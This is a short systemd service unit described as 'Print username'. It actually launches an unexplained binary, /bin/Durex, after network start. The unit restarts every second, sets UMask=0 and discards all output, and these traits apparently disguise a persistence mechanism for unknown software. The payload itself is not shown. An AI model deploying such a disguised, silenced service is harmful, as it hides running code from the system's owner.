[Unit]
Description=Print username
After=network-online.target
Wants=network-online.target
StartLimitIntervalSec=0

[Service]
Type=simple
ExecStart=/bin/Durex
Restart=on-failure
RestartSec=1
WorkingDirectory=/
UMask=0
StandardInput=null
StandardOutput=null
StandardError=null
KillMode=mixed

[Install]
WantedBy=multi-user.target
